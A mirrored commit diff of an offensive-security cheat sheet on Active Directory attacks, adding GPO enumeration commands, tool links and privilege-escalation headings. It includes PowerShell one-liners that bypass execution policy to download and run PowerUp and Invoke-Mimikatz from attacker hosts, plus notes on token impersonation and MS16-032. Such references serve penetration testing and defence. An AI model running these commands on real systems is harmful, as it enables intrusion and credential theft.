ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-01-30 15:15:04 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

AD - Little fixes and refactor

Browse Source
This commit is contained in:
Swissky 2018-04-28 19:54:32 +02:00
parent cb3b298451
commit 2dcffadd46
1 changed files with 18 additions and 13 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

31
Methodology and Resources/Active Directory Attack.md
View File

@ -33,6 +33,12 @@
List all GPO for a domain : List all GPO for a domain :
Get-GPO -domaine DOMAIN.COM -all Get-GPO -domaine DOMAIN.COM -all
Get-GPOReport -all -reporttype xml --all Get-GPOReport -all -reporttype xml --all
or
Powersploit:
Get-NetGPO
Get-NetGPOGroup
``` ```
* Dangerous Built-in Groups Usage * Dangerous Built-in Groups Usage
@ -99,22 +105,21 @@
## Tools ## Tools
* [Impacket](https://github.com/CoreSecurity/impacket) * [Impacket](https://github.com/CoreSecurity/impacket)
* Responder * [Responder](https://github.com/SpiderLabs/Responder)
* Mimikatz * [Mimikatz](https://github.com/gentilkiwi/mimikatz)
* [Ranger](https://github.com/funkandwagnalls/ranger) * [Ranger](https://github.com/funkandwagnalls/ranger)
* BloodHound * [BloodHound](https://github.com/BloodHoundAD/BloodHound)
* RottenPotato
* [AdExplorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer) * [AdExplorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer)
* [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec)
## PowerSploit * [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon)
``` ```
https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon powershell.exe -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks”
powershell.exe -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks” powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');"
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');" ```
```
## PrivEsc - Token Impersonation (RottenPotato) ## Privilege Escalation
### PrivEsc - Token Impersonation (RottenPotato)
Binary available at : https://github.com/foxglovesec/RottenPotato Binary available at : https://github.com/foxglovesec/RottenPotato
Binary available at : https://github.com/breenmachine/RottenPotatoNG Binary available at : https://github.com/breenmachine/RottenPotatoNG
```c ```c
@ -134,7 +139,7 @@ Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -n
``` ```
## PrivEsc - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) ### PrivEsc - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
``` ```
Powershell: Powershell:
https://www.exploit-db.com/exploits/39719/ https://www.exploit-db.com/exploits/39719/